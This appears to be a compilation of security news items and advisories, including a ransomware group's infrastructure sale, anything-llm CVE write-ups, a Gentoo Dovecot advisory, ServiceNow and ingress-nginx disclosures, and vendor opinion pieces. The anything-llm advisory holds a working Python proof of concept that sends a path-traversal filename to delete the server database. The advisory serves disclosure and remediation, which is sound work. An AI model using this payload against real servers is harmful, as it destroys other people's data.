By Waqas
The infamous RansomedVC Ransomware Group is calling it quits and selling its entire cyber infrastructure due to "personal reasons."
This is a post from HackRead.com Read the original post: RansomedVC Ransomware Group Quitting and Selling its Entire Infrastructure

The announcement came on Telegram just a week after the RansomedVC ransomware claimed responsibility for hacking the Colonial Pipeline in the United States.

The infamous RansomedVC ransomware group, responsible for a string of high-profile ransomware attacks, has abruptly announced its dissolution. The group, known for its sophisticated hacking tactics and exploitation of the European Union’s GDPR laws, has decided to sell its entire infrastructure.

RansomedVC, which first emerged in August 2023, targeted a wide array of entities, from major corporations to government bodies and educational institutions. Their modus operandi involved infiltrating networks, exfiltrating sensitive data, and subsequently threatening victims with publication of the stolen information unless a substantial ransom was paid. Notably, they also exploited the threat of reporting victims to GDPR authorities, potentially resulting in severe penalties.

The group’s most prominent alleged victims included well-known names such as Sony Corporation and the Colonial Pipeline, victims of the group’s extortion tactics in September and October 2023, respectively.

However, RansomedVC has taken an unexpected and unprecedented step by putting their entire toolkit up for sale. As seen by Hackread.com, the sale includes a staggering array of assets, such as various domains and forums, a ransomware builder with promised 100% undetectability by antivirus software, access to affiliate groups, social media accounts, Telegram channels, VPN access to multiple companies with a jaw-dropping revenue of $3 billion, databases worth over $10 million each, and more.

The group’s admin, while announcing the sale, mentioned “personal reasons” for the decision but categorically stated that these reasons would not be disclosed to journalists or the public.

> _I do not want to continue running the project due to personal reasons, none will be disclosed to journalist, dont even ask. We are selling everything._
> 
> RansomedVC

For now, one could only speculate the reasons of the group’s sudden sale. It could be pressure from law enforcement agencies, or even the possibility of a new and more sophisticated cyber operation in the making.

RansomedVC’s announcment on Telegram (Image credit: Hackread.com)

It’s worth noting that on May 6th, 2021, the Colonial Pipeline fell victim to a successful hack by the ransomware group DarkSide. Just days later, on May 9th, the group was compelled to disband after the FBI seized and recovered the Bitcoin ransom paid by the pipeline, leading to their disappearance.”

Nevertheless, depending on who purchases the infrastructure, there is concern about a potential surge in cyber threats and attacks. If you run a business with an online presence, it’s essential to protect it from ransomware attacks by following these simple yet vital steps:

1.  **Regular Data Backup and Recovery:** Ensure you frequently back up all your important data and systems to an external device or a cloud-based service. Having a robust backup system in place enables you to restore your data without having to pay the ransom demanded by attackers.
2.  **Use Reliable Security Software:** Implement and maintain strong, updated antivirus and anti-malware software on all devices. These tools can help detect and block potential ransomware threats before they can cause harm. Regularly update this software to ensure it’s equipped to handle new threats.
3.  **Employee Training and Awareness:** Educate and train employees about the risks of ransomware attacks. Emphasize the importance of not clicking on suspicious links, downloading unknown attachments, or visiting unverified websites. Create protocols for handling emails and files from unknown sources.
4.  **Keep Software Updated:** Regularly update all operating systems, software, and applications on your devices. Updates often contain security patches that fix vulnerabilities that cybercriminals could exploit to launch ransomware attacks.
5.  **Network Segmentation and Access Controls:** Segment your network and limit access rights. This means restricting user permissions so that each user only has access to the information and resources necessary for their job. This reduces the chances of a ransomware attack spreading throughout the entire network if one device is compromised.

****_RELATED ARTICLES_****

1.  Dark Web Genesis Market for Sale
2.  Dark Web Domain of Genesis Market and Infrastructure Sold
3.  Military Satellite Access Sold on Russian Hacker Forum for $15,000

RansomedVC Ransomware Group Quitting and Selling its Entire Infrastructure

Improper Input Validation in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

**Description**

The /process endpoint of the python API (in collector/api.py) exposes an endpoint waiting for a POST request with a parameter named filename :

    @api.route("/process", methods=["POST"])
    def process_file():
        content = request.json
        target_filename = content.get("filename")
        print(f"Processing {target_filename}")
        success, reason = process_single(WATCH_DIRECTORY, target_filename)
        return json.dumps(
            {"filename": target_filename, "success": success, "reason": reason}
        )
    

Then, the filename is passed to the process_single function :

    def process_single(directory, target_doc):
      if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
      
      if os.path.exists(f"{directory}/{target_doc}") is False: 
        print(f"{directory}/{target_doc} does not exist.")
        return (False, f"{directory}/{target_doc} does not exist.")
    
      filename, fileext = os.path.splitext(target_doc)
      if filename in ['.DS_Store'] or fileext == '': return False
      if fileext == '.lock':
        print(f"{filename} is locked - skipping until unlocked")
        return (False, f"{filename} is locked - skipping until unlocked")
    
      if fileext not in FILETYPES.keys():
        print(f"{fileext} not a supported file type for conversion. It will not be processed.")
        move_source(new_destination_filename=target_doc, failed=True, remove=True)
        return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")
    

If filename **HAS** a file extension and that extension **IS NOT** among theses extensions :

    FILETYPES = {
        '.txt': as_text,
        '.md': as_markdown,
        '.pdf': as_pdf,
        '.docx': as_docx,
        '.odt': as_odt,
        '.mbox': as_mbox, 
    }
    

and if the filename points to an existing file, the following function is called (with failed=True, remove=True) :

    def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
        if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
            print(f"{new_destination_filename} deleted from filesystem")
            os.remove(f"{working_dir}/{new_destination_filename}")
            return
     
    

Thus, the file is deleted.

However, since the parameter filename is not sanitized against **PATH TRAVERSAL**, a filename such as ../../server/storage/anythingllm.db can be used to remove the database of the website.

**Proof of Concept**

    # PoC.py
    import requests
    
    if __name__ == "__main__":
        server_ip = "127.0.0.1"
        file_to_delete = "../../server/storage/anythingllm.db"
    
        data = {"filename" : file_to_delete}
        requests.post(f"http://{server_ip}:8888/process", json=data)
    

**Remediation****User input should be sanitized**

For file name parameters, Flask implement a function named secure_filename to manage filename securely, documentation can be found here. The function os.path.basename could also be used.

Moreover, it may be a better practice to use os.path.join instead of concatenating strings using +.

**Python API should only listen on loopback interface**

In the documentation (collector/README.md), the following command is mentioned to run the Python API :

    flask run --host '0.0.0.0' --port 8888
    

However, simply listening on 127.0.0.1 should be enough. The docker version seems 'safe' because only the port 3001 is exposed to the host (however it is still reachable from the docker0 interface on the host, but the attacker would need to be logged in the server).  
But using the manual installation method, it may results in a Python API exposed to the internet. Here is an example of an instance exposed to the Internet on shodan :

**Impact**

This vulnerability allows an unauthenticated attacker to delete almost any file, such as the server database.

**Occurrences**

CVE-2023-5832: Improper input validation leads to arbitrary file deletion in anything-llm

Improper Access Control in GitHub repository mintplex-labs/anything-llm prior to 0.1.0.

Expand Up @@ -239,6 +239,16 @@ function systemEndpoints(app) { async (request, response) \=> { try { const body \= reqBody(request);  
// Only admins can update the ENV settings. if (multiUserMode(response)) { const user \= await userFromSession(request, response); if (!user || user?.role !== "admin") { response.sendStatus(401).end(); return; } }  
const { newValues, error } \= updateENV(body); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ newValues, error }); Expand All @@ -254,11 +264,21 @@ function systemEndpoints(app) { \[validatedRequest\], async (request, response) \=> { try { // Cannot update password in multi - user mode. if (multiUserMode(response)) { response.sendStatus(401).end(); return; }  
const { usePassword, newPassword } \= reqBody(request); const { error } \= updateENV({ AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }); const { error } \= updateENV( { AuthToken: usePassword ? newPassword : "", JWTSecret: usePassword ? v4() : "", }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); response.status(200).json({ success: !error, error }); } catch (e) { console.log(e.message, e); Expand Down Expand Up @@ -293,8 +313,15 @@ function systemEndpoints(app) { limit\_user\_messages: false, message\_limit: 25, }); process.env.AUTH\_TOKEN \= null; process.env.JWT\_SECRET \= process.env.JWT\_SECRET ?? v4(); // Make sure JWT\_SECRET is set for JWT issuance.  
updateENV( { AuthToken: null, JWTSecret: process.env.JWT\_SECRET ?? v4(), }, true ); if (process.env.NODE\_ENV \=== "production") await dumpENV(); await Telemetry.sendTelemetry("enabled\_multi\_user\_mode"); response.status(200).json({ success: !!user, error }); } catch (e) { Expand Down

CVE-2023-5833: Prevent updates of specific keys via API (#256) · Mintplex-Labs/anything-llm@d5b1f84

Gentoo Linux Security Advisory 202310-19 - A vulnerability has been discovered in Dovecot that can lead to a privilege escalation when master and non-master passdbs are used. Versions greater than or equal to 2.3.19.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Dovecot: Privilege Escalation  
     Date: October 30, 2023  
     Bugs: #856733  
       ID: 202310-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Dovecot that can lead to a  
privilege escalation when master and non-master passdbs are used.

Background  
==========

Dovecot is an open source IMAP and POP3 email server.

Affected packages  
=================

Package           Vulnerable     Unaffected  
----------------  -------------  --------------  
net-mail/dovecot  < 2.3.19.1-r1  >= 2.3.19.1-r1

Description  
===========

A vulnerability has been discovered in Dovecot. Please review the CVE  
identifier referenced below for details.

Impact  
======

When two passdb configuration entries exist in Dovecot configuration,  
which have the same driver and args settings, the incorrect  
username_filter and mechanism settings can be applied to passdb  
definitions. These incorrectly applied settings can lead to an  
unintended security configuration and can permit privilege escalation  
with certain configurations involving master user authentication.

Dovecot documentation does not advise against the use of passdb  
definitions which have the same driver and args settings. One such  
configuration would be where an administrator wishes to use the same pam  
configuration or passwd file for both normal and master users but use  
the username_filter setting to restrict which of the users is able to be  
a master user.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Dovecot users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-mail/dovecot-2.3.19.1-r1"

References  
==========

[ 1 ] CVE-2022-30550  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30550

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-19

Earlier this week, ServiceNow announced on its support site that misconfigurations within the platform could result in “unintended access” to sensitive data. For organizations that use ServiceNow, this security exposure is a critical concern that could have resulted in major data leakage of sensitive corporate data. ServiceNow has since taken steps to fix this issue. 
This article fully analyzes

SaaS Security / Data Security

Earlier this week, ServiceNow announced on its support site that misconfigurations within the platform could result in "unintended access" to sensitive data. For organizations that use ServiceNow, this security exposure is a critical concern that could have resulted in major data leakage of sensitive corporate data. ServiceNow has since taken steps to fix this issue.

This article fully analyzes the issue, explains why this critical application misconfiguration could have had serious consequences for businesses, and remediation steps companies would take, if not for the ServiceNow fix. (Although, recommended to double check that the fix has closed the organization's exposure.)

**In a Nutshell**

ServiceNow is a cloud-based platform used for automating IT service management, IT operations management, and IT business management for customer service, as well as HR, security operations, and a wide variety of additional domains. This SaaS application is considered to be one of the top business-critical applications due to its infrastructural nature, extensibility as a development platform, and access to confidential and proprietary data throughout the organization.

Simple List is an interface widget that pulls data that is stored in tables and uses them in dashboards. **The default configuration for Simple List allows the data in the tables to be accessed remotely by unauthenticated users.** These tables include sensitive data, including content from IT tickets, internal classified knowledge bases, employee details, and more.

These misconfigurations have actually been in place since the introduction of Access Control Lists in 2015. To date, there were no reported incidents as a result. However, considering the recent publication of the data leakage research, leaving it unresolved could have exposed companies more than ever.

This exposure was the result of just one default configuration — and there are hundreds of configurations covering access control, data leakage, malware protection, and more that must be secured and maintained. For organizations using an SSPM (SaaS Security Posture Management solution), like Adaptive Shield, organizations can more easily identify risky misconfigurations and see if they are compliant or non-compliant (see image 1 below).

Learn more about how SSPM secures the critical apps in your SaaS stack

**Inside the ServiceNow Misconfigurations**

It's important to reiterate that this issue was not caused by a vulnerability in ServiceNow's code but by a configuration that exists within the platform.

This issue stems from security controls in a ServiceNow Access Control List (ACL) widget called Simple List, which puts records into easily readable tables. These tables organize information from multiple sources and have configurations with a default setting of Public Access.

Because these tables are the core of ServiceNow, the issue wasn't contained within a single setting that can be fixed. It needed to be remediated in multiple locations within the application in combination with the usage of the UI widget, and throughout all tenants. Further complicating the issue, was that changing a single setting could break existing workflows connected to the Simple List tables, causing severe disruption of existing processes.

**Remediation Steps**

Published by ServiceNow in their knowledge base article – General Information | Potential Public List Widget Misconfiguration, the exposure assessment and remediation measures include:

*   Review Access Control Lists (ACLs) that either are entirely empty or, alternately, contain the role "Public"
*   Review public widgets and set the "Public" flag to false where it is not aligned with their use cases
*   Consider using stricter access control measures using built-in controls offered by ServiceNow, such as IP Address Access Control or Adaptive Authentication
*   Consider installing ServiceNow _Explicit Roles Plugin_. ServiceNow states that the plugin prevents external users from accessing internal data and instances using this plugin are not affected by this issue (the plugin ensures that every ACL declares at least one role requirement)

These recommended remediation steps can still be utilized for organizations that are exposed (even after the fix) as it's worth double checking to ensure top security throughout the organization.

Learn more about automating your ServiceNow Security

**Automate Data Leakage Prevention for ServiceNow**

Organizations that use a SaaS Security Posture Management (SSPM) solution, like Adaptive Shield, are able to gain visibility into ServiceNow' and any other SaaS app's configurations and remediate any configuration issue.

Image 1: Adaptive Shield dashboard with the compliance framework: ServiceNow KB1553688 - Public List Widget Misconfiguration

SSPMs alert security teams when there are high-risk configurations, enabling them to adjust their settings and prevent any type of data leakage. This way, companies gain a better understanding of their company's attack surface, level of risk, and security posture with an SSPM.

Click here to request a demo and get an assessment of any app exposure

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

ServiceNow Data Exposure: A Wake-Up Call for Companies

Unverified Password Change in GitHub repository pimcore/admin-ui-classic-bundle prior to 1.2.0.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

\[Improvement\]: Check if new password is NOT the same as the old one w…

…hen resetting (#285)

\* add check that new passoword is different than old one

\* refactor empty old password check

\* add CHANGELOG

\* Update CHANGELOG.md

---------

Co-authored-by: Divesh Pahuja <divesh.pahuja@pimcore.com>

*   Loading branch information

Showing **2 changed files** with **6 additions** and **0 deletions**.

*   CHANGELOG.md
*   *   UserController.php

1 change: 1 addition & 0 deletions CHANGELOG.md

  

@@ -1,5 +1,6 @@

\#### v1.2.0

\- DataObject used to automatically reload version after save, but now it's triggered only on successfull save. The reload can be forced by setting \`forceReloadVersionsAfterSave\` to \`true\` in a \`postSaveObject\` event listener.

\- \[User -> Settings\] When resetting password, setting the new password same as the old one would throw an error.

  

\#### v1.1.0

\- \`Pimcore\\Bundle\\AdminBundle\\Service\\ElementService\` is marked as internal.

Expand Down

5 changes: 5 additions & 0 deletions src/Controller/Admin/UserController.php

Expand Up

@@ -589,6 +589,11 @@ public function updateCurrentUserAction(Request $request, ValidatorInterface $va

}

  

if ($oldPasswordCheck && $values\['new\_password'\] == $values\['retype\_password'\]) {

  

if (Tool\\Authentication::verifyPassword($user, $values\['new\_password'\])) {

throw new \\Exception('The new password cannot be the same as the old one');

}

  

$values\['password'\] = Tool\\Authentication::getPasswordHash($user\->getName(), $values\['new\_password'\]);

} else {

if (!$oldPasswordCheck) {

Expand Down

**0 comments on commit 498ac77**

Please sign in to comment.

CVE-2023-5844: [Improvement]: Check if new password is NOT the same as the old one w… · pimcore/admin-ui-classic-bundle@498ac77

With the rapid advancement and adoption of artificial intelligence (AI) in cybersecurity, the benefits of speed and accuracy are becoming clearer every day.

In their 1955 proposal for a summer research project on artificial intelligence (AI), researchers at Dartmouth Conference predicted "…every aspect of learning or any other feature of intelligence can in principle be so precisely described that a machine can be made to simulate it." In the decades that followed, AI research continued at what seemed a glacial pace, always promising a breakthrough in the near future — until language tools like ChatGPT finally exploded on the scene.

As we find our footing with AI today, it's clear that we're facing risks as well as benefits. A recent survey of 1,500 IT professionals showed that nearly half (49%) of decision-makers are concerned the new tools will help cybercriminals, but a full 82% said they plan to integrate AI into their security programs over the next two years.

**AI Is the Hero to Embrace, Not the Villain to Defeat**

Rapid advancements in AI since the 1950s set the stage for growth — with no signs of slowing. The global market for AI-based security tools is expected to reach $133 billion by 2030 with more integration and use in daily DevSecOps workflows. As the industry incorporates AI and machine learning (ML) into more processes, we're seeing more and more opportunities to engage AI as a force for good, including the following.

**Faster and More Accurate Configuration for Security Tools**

To be effective, most security technologies today require a lot of manual fine-tuning, often through sophisticated parameter tweaks. Depending on the tool, these can affect what incidents are reported, what vulnerabilities a tool finds, or how issue priorities are determined. All these manual tweaks are time-consuming and can leave you exposed to threats until the right configurations are in place.

That's where machine learning comes to the rescue. In this case, ML can continually optimize parameters, for instance by prioritizing items in a scanning queue to ensure operations run as efficiently as possible. Once they automate these configuration tasks, future cybersecurity teams will spend far less time on tedious manual work.

**Improved Risk Scoring and Threat Intelligence**

Modern scanning tools typically provide a risk assessment once a scan is complete. This shows the various levels of security protection and potential risk across your applications, websites, and networks for a better view of your threat exposure. Different tools will factor in different data, such as the technical severity of vulnerabilities, their potential exploitability, their impact on business if exploited, and their importance for your overall security posture.

While useful, these assessments don't always provide deeper context or guidance, which are necessary for security to keep up with fast-paced software development. In the coming years, security tools will extensively use machine learning for evaluating risk and managing threats. As machine-generated results continue to improve in scope and quality, they will support more accurate, data-based decision making by showing which issues are actionable and in what order they should be addressed to minimize risk.

**Putting a Sharper Edge on Security Testing**

As ChatGPT and similar tools powered by large language models (LLMs) are refined and continue to gain popularity, we can expect easier access to ever more accurate insights. By encouraging engineers and developers to safely use AI and ML in their work, these machine-driven solutions should also provide better and more useful insights over time — even more so when accurate security guidance is included in the mix.

When it comes to security testing, training AI/ML tools to become sharper will further help with fine-tuning static application security testing (SAST) and dynamic application security testing (DAST) tools. Ultimately that means increasing control and precision for scan results, providing reliable intelligence into current and future risks, and improving the efficacy of vulnerability hunting.

**Fewer False Positives for Less Manual Verification**

False positives are a persistent challenge for security and one that frequently translates into hours of manual work checking scan results. As teams spend valuable time verifying reports that should already be as accurate as possible, they can lose confidence in security tools and processes. Fortunately, a recent study by IBM showed that AI can reduce false positives by 65%, freeing resources for activities that add business value.

As the technology progresses, business and operational leaders will have the reliable data they need to confidently make decisions based on accurate AI/ML results. These outputs will harness the power of learning systems to deliver clear and actionable vulnerability reports, allowing DevSecOps teams to focus on what matters most: building and delivering innovative applications.

**Winning the Race to AI Supremacy in Security**

From threat identification to tool configuration, we're already seeing tangible impacts of AI in cybersecurity. Where researchers at the Dartmouth Conference nearly 70 years ago were only speculating, cybersecurity professionals today should look for far more tangible opportunities to incorporate AI and ML into their operations and strategies. If we can realize the potential of existing and emerging tools to continuously improve cybersecurity, AI can truly be one of the good guys.

**About the Author**

    

Frank Catucci is a global application security technical leader with over 20 years of experience designing scalable application security-specific architecture, partnering with cross-functional engineering and product teams. Frank is a past OWASP chapter president and contributor to the OWASP bug bounty initiative and most recently was the Head of Application & Product Security at Data Robot. Prior to that role, Frank was the Sr. Director of Application Security & DevSecOps and Security Researcher at Gartner, and was also the Director of Application Security for Qualys. Outside of work and hacking things, Frank and his wife maintain a family farm. He is an avid outdoors fan and loves all types of fishing, boating, watersports, hiking, camping, and especially dirt bikes and motorcycles.

Getting Smart With Cybersecurity: AI Can Help the Good Guys, Too

CISOs offer recommendations to help secure identities, data, code, and cloud infrastructure and protect against evolving threats and vulnerabilities.

The COVID-19 pandemic ignited an unprecedented wave of remote work adoption, forcing organizations to rapidly embrace remote collaboration tools. However, the transition to remote work came with its own set of challenges, especially in ensuring robust security measures for remote access. Today, CISOs face a new frontier — a borderless enterprise landscape — where they must forge a strong security posture to protect their organizations from evolving threats and vulnerabilities.

To better understand these demands, Cisco partnered with Forgepoint Capital, NightDragon, and Team8 to evaluate the evolving threat landscape and gather invaluable insights and takeaways that chief information security officers (CISOs) can leverage to prepare for the future. Together, we created the 2023 CISO Survival Guide, a simple framework for understanding how teams can secure modern enterprises by defining the security posture of identities, data, and code that are distributed across a hybrid infrastructure.

**Identity**

Identity management is a critical concern for CISOs, as the lack of a unified platform across identity access management (IAM), identity governance and administration (IGA), and privileged access management (PAM) leads to a fragmented identity topology within organizations. CISOs express the need for technology startups to address this pain point by offering solutions that are easier to deploy, provide comprehensive coverage, and offer rich integrations.

**Data**

CISOs are no longer tasked with security alone. They are also now responsible for securely enabling overall collaboration and business operations. This means they must balance data protection and use. To do this, CISOs are breaking data down into four key categories:

*   **Data collaboration:** Being able to locate and apply data governance controls on distributed data.
*   **Data reliability:** Making sure data is accurate and useable.
*   **Data privacy management:** Applying governance, risk, and compliance controls to adhere to data privacy regulations and enable analytics on sensitive data.
*   **Data protection:** Finding, categorizing, and remediating access so that all data serves its intended purpose.

**Code**

As agile DevOps creates a more rapid software development life cycle, enterprise security will only be as strong as its weakest link: the software supply chain. To give an idea of how big a deal this is, 70% of CISOs surveyed say they are prioritizing securing the software supply chain. To do this, CISOs will need full visibility into the development pipeline so that they can adopt a holistic strategy, which includes open source governance, delivery pipeline management, and an understanding of risk in third-party software.

Third-party software is its own issue. It supports quick innovation while operating a distributed workforce, but it can be a black box for CISOs looking to secure their enterprise. Third parties should be held to the same security standards as the rest of the enterprise.

**Infrastructure**

If it is connected, it needs to be secured, even if you can't see it. This is the cloud. By 2025 more than 85% of enterprises are expected to embrace a cloud-first approach. That means cloud security must be near the top of any CISO's priorities because attackers are shifting to the cloud just as quickly as enterprises. There are many tools out there that let enterprises address data challenges related to the cloud, but they don't necessarily go far enough to help CISOs discover the who, what, and where in the event of a data breach.

**CISO Survival Guide**

There is a lot that CISOs must do to stay ahead of these constantly evolving cybersecurity threats. Thankfully, emerging technology startups are providing fresh solutions to help CISOs stay one step ahead of the game in securing their enterprises. Defining security postures of the identities, data, and code distributed across a hybrid infrastructure is just one part to having a secured network that can protect data with a distributed workforce.

For more information, with an in-depth look at survey results as well as insights and analysis from CISOs, read the 2023 CISO Survival Guide from Cisco.

**About the Author**

    

Janey Hoe is a Vice President of Cisco Investments. Previously, she held multiple product management, technical marketing, and business development leadership roles at Cisco, operating multi-billion-dollar product lines as well as pioneering new products in switching, security, data center, and video collaboration. Along with her team, she was recognized as a finalist for the Pioneer Award, the highest honor for innovation at Cisco.

Securing Modern Enterprises in a Borderless Landscape

The CISO role has evolved from a strictly technical position to one that increasingly requires business acumen. Here are some things you need to know.

What types of skills do CISOs need now? As senior vice president and chief information security officer (CISO) of one of the world's most trusted cybersecurity software and services companies, it's literally my job to know.

My responsibilities include protecting and enabling business development at a global organization that wears a big target on its back. We are also "customer zero" at a company that believes deeply in the need to "drink its own champagne." That means we base our cyber defenses on our own internally developed products to the greatest extent possible.

In addition, we're a managed security service provider (MSSP) through our CylanceGUARD managed detection and response (MDR) subscription service, and many of our channel partners are also MSSPs, all using BlackBerry Cylance artificial intelligence (AI)-based products to protect external organizations.

The ultimate decision-maker for purchasing and deploying our portfolio of cyber products is often the CISO of an organization. For all these reasons and more, I spend a fair amount of time talking to fellow CISOs and comparing notes on what keeps us up at night and what success looks like for a modern CISO.

Over two decades of cybersecurity and technology experience across a wide range of industries and organizations have helped me grow as a leader and afforded me many opportunities to "give back" by sharing hard-won knowledge with other cybersecurity professionals. I have watched the CISO role evolve from a strictly technical position to one that increasingly requires business ability and acumen.

Today's CISOs must be able to effectively evaluate both risk and opportunity. They must be able to formulate and execute strategies to strike a healthy balance between these two competing factors and communicate those solutions to senior leadership.

**What Future CISOs Need to Know**

If you are already a CISO, you are well aware of the way this role has pivoted. But what if you are a cybersecurity professional aspiring to reach a CISO role? What kind of mindset and skills should you cultivate? Here are a few to consider.

*   **CISOs must be critical thinkers:** In our digitized world, CISOs play a pivotal role beyond the technical aspects by engaging in strategic business discussions. Their input should be integral to organizational decision-making, requiring a balance of technical and business acumen.
*   **CISOs must be educators:** With increasing reliance on CISO insights for business decisions, they must educate boards and decision-makers and often report directly to CEOs. Staying updated on industry trends and aligning decisions with current risks is essential.
*   **CISOs must value different perspectives:** Effective CISOs benefit from diverse security perspectives gained through experiences in various industries and roles. A broad background spanning different functions equips them to excel in their roles.
*   **CISOs are cybersecurity evangelists:** As cybersecurity leaders, CISOs promote a multi-layered defense strategy, encompassing both technological advancements and workforce awareness. They ensure that end users are informed about risks and contribute as an additional layer of defense.

**Final Advice for All Information Security Professionals**

As you build and mature your program using multi-layered defenses, always bear in mind that _cyber risk can only be managed, never eliminated_. For today's CISOs and those of the future, cyber-risk is another type of business risk every organization will continually face.

In an interview earlier this year, I shared what I think are the top cyber-risk challenges facing CISOs.

I hope these perspectives will help you on your CISO journey, no matter which stage of your career you are in.

**About the Author**

    

Arvind Raman is a Senior Vice President and BlackBerry's Chief Information Security Officer. In this role, he leads all aspects of the company's information security, product security, and GRC program globally, focusing on effective management of cybersecurity risks, policies, and procedures.

Arvind brings over 20 years of information security, technology, R&D experience, and leadership to BlackBerry. Arvind's previous experience includes serving as the Global CISO at Mitel, Global Head Information Security for Scotia Bank, and Director of Cyber & Data Security for CIBC.

CISO Skills in a Changing Security Market: Are You Prepared?

Three unpatched high-severity security flaws have been disclosed in the NGINX Ingress controller for Kubernetes that could be weaponized by a threat actor to steal secret credentials from the cluster.
The vulnerabilities are as follows - 

CVE-2022-4886 (CVSS score: 8.8) - Ingress-nginx path sanitization can be bypassed to obtain the credentials of the ingress-nginx controller
CVE-2023-5043 (

Kubernetes / Server Security

Three unpatched high-severity security flaws have been disclosed in the NGINX Ingress controller for Kubernetes that could be weaponized by a threat actor to steal secret credentials from the cluster.

The vulnerabilities are as follows -

*   **CVE-2022-4886** (CVSS score: 8.8) - Ingress-nginx path sanitization can be bypassed to obtain the credentials of the ingress-nginx controller
*   **CVE-2023-5043** (CVSS score: 7.6) - Ingress-nginx annotation injection causes arbitrary command execution
*   **CVE-2023-5044** (CVSS score: 7.6) - Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation

"These vulnerabilities enable an attacker who can control the configuration of the Ingress object to steal secret credentials from the cluster," Ben Hirschberg, CTO and co-founder of Kubernetes security platform ARMO, said of CVE-2023-5043 and CVE-2023-5044.

Successful exploitation of the flaws could allow an adversary to inject arbitrary code into the ingress controller process, and gain unauthorized access to sensitive data.

CVE-2022-4886, a result of a lack of validation in the "spec.rules\[\].http.paths\[\].path" field, permits an attacker with access to the Ingress object to siphon Kubernetes API credentials from the ingress controller.

"In the Ingress object, the operator can define which incoming HTTP path is routed to which inner path," Hirschberg noted. "The vulnerable application does not check properly the validity of the inner path and it can point to the internal file which contains the service account token that is the client credential for authentication against the API server."

In the absence of fixes, the maintainers of the software have released mitigations that involve enabling the "strict-validate-path-type" option and setting the --enable-annotation-validation flag to prevent the creation of Ingress objects with invalid characters and enforce additional restrictions.

ARMO said that updating NGINX to version 1.19, alongside adding the "--enable-annotation-validation" command-line configuration, resolves CVE-2023-5043 and CVE-2023-5044.

"Although they point in different directions, all of these vulnerabilities point to the same underlying problem," Hirschberg said.

"The fact that ingress controllers have access to TLS secrets and Kubernetes API by design makes them workloads with high privilege scope. In addition, since they are often public internet facing components, they are very vulnerable to external traffic entering the cluster through them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth